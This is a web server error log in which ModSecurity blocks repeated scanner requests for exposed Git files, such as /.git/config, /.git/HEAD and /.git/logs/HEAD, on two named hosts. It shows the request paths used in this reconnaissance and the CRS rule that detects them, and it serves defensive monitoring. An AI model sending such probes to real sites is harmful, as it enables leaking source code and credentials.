[Sat Jul 05 22:19:32.998139 2025] [:error] [pid 945017] [client 34.162.91.162:55638] [client 34.162.91.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGmI1AYPiW9TpyX8DsazOwAAAAM"]
[Sat Jul 05 22:19:32.998315 2025] [:error] [pid 945017] [client 34.162.91.162:55638] [client 34.162.91.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGmI1AYPiW9TpyX8DsazOwAAAAM"]
[Sat Jul 05 22:19:33.107876 2025] [:error] [pid 945017] [client 34.162.91.162:55638] [client 34.162.91.162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGmI1QYPiW9TpyX8DsazPAAAAAM"]
[Sat Jul 05 22:19:33.108095 2025] [:error] [pid 945017] [client 34.162.91.162:55638] [client 34.162.91.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGmI1QYPiW9TpyX8DsazPAAAAAM"]
[Sat Jul 05 22:19:33.108282 2025] [:error] [pid 945017] [client 34.162.91.162:55638] [client 34.162.91.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGmI1QYPiW9TpyX8DsazPAAAAAM"]
[Sat Jul 05 23:57:52.981745 2025] [:error] [pid 945204] [client 34.162.236.120:48282] [client 34.162.236.120] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGmf4J30TDEiU-DmXzLaEgAAAAY"]
[Sat Jul 05 23:57:52.982044 2025] [:error] [pid 945204] [client 34.162.236.120:48282] [client 34.162.236.120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGmf4J30TDEiU-DmXzLaEgAAAAY"]
[Sat Jul 05 23:57:52.982228 2025] [:error] [pid 945204] [client 34.162.236.120:48282] [client 34.162.236.120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGmf4J30TDEiU-DmXzLaEgAAAAY"]
[Sat Jul 05 23:57:53.091920 2025] [:error] [pid 945204] [client 34.162.236.120:48282] [client 34.162.236.120] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGmf4Z30TDEiU-DmXzLaEwAAAAY"]
[Sat Jul 05 23:57:53.092147 2025] [:error] [pid 945204] [client 34.162.236.120:48282] [client 34.162.236.120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGmf4Z30TDEiU-DmXzLaEwAAAAY"]
[Sat Jul 05 23:57:53.092332 2025] [:error] [pid 945204] [client 34.162.236.120:48282] [client 34.162.236.120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGmf4Z30TDEiU-DmXzLaEwAAAAY"]
[Sun Jul 06 06:46:01.227676 2025] [:error] [pid 968044] [client 34.162.151.190:59946] [client 34.162.151.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGn_iRcrdhACkz4kNY6ekwAAAAU"]
[Sun Jul 06 06:46:01.228783 2025] [:error] [pid 968044] [client 34.162.151.190:59946] [client 34.162.151.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGn_iRcrdhACkz4kNY6ekwAAAAU"]
[Sun Jul 06 06:46:01.229087 2025] [:error] [pid 968044] [client 34.162.151.190:59946] [client 34.162.151.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGn_iRcrdhACkz4kNY6ekwAAAAU"]
[Sun Jul 06 06:46:01.338758 2025] [:error] [pid 968044] [client 34.162.151.190:59946] [client 34.162.151.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGn_iRcrdhACkz4kNY6elAAAAAU"]
[Sun Jul 06 06:46:01.338978 2025] [:error] [pid 968044] [client 34.162.151.190:59946] [client 34.162.151.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGn_iRcrdhACkz4kNY6elAAAAAU"]
[Sun Jul 06 06:46:01.339165 2025] [:error] [pid 968044] [client 34.162.151.190:59946] [client 34.162.151.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGn_iRcrdhACkz4kNY6elAAAAAU"]
[Sun Jul 06 09:02:40.131769 2025] [:error] [pid 971499] [client 34.162.201.127:45818] [client 34.162.201.127] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGofkGwijxPcOkYoHt_4uwAAAA0"]
[Sun Jul 06 09:02:40.132029 2025] [:error] [pid 971499] [client 34.162.201.127:45818] [client 34.162.201.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGofkGwijxPcOkYoHt_4uwAAAA0"]
[Sun Jul 06 09:02:40.132231 2025] [:error] [pid 971499] [client 34.162.201.127:45818] [client 34.162.201.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGofkGwijxPcOkYoHt_4uwAAAA0"]
[Sun Jul 06 09:02:40.242255 2025] [:error] [pid 971499] [client 34.162.201.127:45818] [client 34.162.201.127] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGofkGwijxPcOkYoHt_4vAAAAA0"]
[Sun Jul 06 09:02:40.242524 2025] [:error] [pid 971499] [client 34.162.201.127:45818] [client 34.162.201.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGofkGwijxPcOkYoHt_4vAAAAA0"]
[Sun Jul 06 09:02:40.242716 2025] [:error] [pid 971499] [client 34.162.201.127:45818] [client 34.162.201.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGofkGwijxPcOkYoHt_4vAAAAA0"]
[Mon Jul 07 14:43:57.294397 2025] [:error] [pid 989741] [client 143.198.191.145:56692] [client 143.198.191.145] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGvBDYZW7uBBeGph-gr29QAAAAU"]
[Mon Jul 07 14:43:57.296460 2025] [:error] [pid 989741] [client 143.198.191.145:56692] [client 143.198.191.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGvBDYZW7uBBeGph-gr29QAAAAU"]
[Mon Jul 07 14:43:57.296800 2025] [:error] [pid 989741] [client 143.198.191.145:56692] [client 143.198.191.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGvBDYZW7uBBeGph-gr29QAAAAU"]
[Wed Jul 09 19:35:52.702988 2025] [:error] [pid 1056049] [client 206.189.176.227:59910] [client 206.189.176.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aG6oeAt52_UqvTTiIE7M4AAAAAM"]
[Wed Jul 09 19:35:52.704296 2025] [:error] [pid 1056049] [client 206.189.176.227:59910] [client 206.189.176.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aG6oeAt52_UqvTTiIE7M4AAAAAM"]
[Wed Jul 09 19:35:52.704516 2025] [:error] [pid 1056049] [client 206.189.176.227:59910] [client 206.189.176.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aG6oeAt52_UqvTTiIE7M4AAAAAM"]
[Thu Jul 10 11:17:17.491308 2025] [:error] [pid 1065737] [client 206.189.176.227:52102] [client 206.189.176.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aG-FHaLicSuvMVdabbq1eQAAAAA"]
[Thu Jul 10 11:17:17.493610 2025] [:error] [pid 1065737] [client 206.189.176.227:52102] [client 206.189.176.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aG-FHaLicSuvMVdabbq1eQAAAAA"]
[Thu Jul 10 11:17:17.493852 2025] [:error] [pid 1065737] [client 206.189.176.227:52102] [client 206.189.176.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aG-FHaLicSuvMVdabbq1eQAAAAA"]
[Sun Jul 13 06:22:46.693157 2025] [:error] [pid 1140431] [client 195.178.110.161:53354] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHM0lkEaJS_T2v20d-2KAwAAAAE"]
[Sun Jul 13 06:22:46.694705 2025] [:error] [pid 1140431] [client 195.178.110.161:53354] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHM0lkEaJS_T2v20d-2KAwAAAAE"]
[Sun Jul 13 06:22:46.694871 2025] [:error] [pid 1140431] [client 195.178.110.161:53354] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHM0lkEaJS_T2v20d-2KAwAAAAE"]
[Mon Jul 14 05:24:27.133936 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aHR4a_duQ56bujdijAYiawAAAAI"]
[Mon Jul 14 05:24:27.134247 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aHR4a_duQ56bujdijAYiawAAAAI"]
[Mon Jul 14 05:24:27.134467 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aHR4a_duQ56bujdijAYiawAAAAI"]
[Mon Jul 14 05:24:27.286181 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info/exclude"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/info/exclude"] [unique_id "aHR4a_duQ56bujdijAYibAAAAAI"]
[Mon Jul 14 05:24:27.286588 2025] [:error] [pid 1165362] [client 185.177.72.106:44264] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/info/exclude"] [unique_id "aHR4a_duQ56bujdijAYibAAAAAI"]
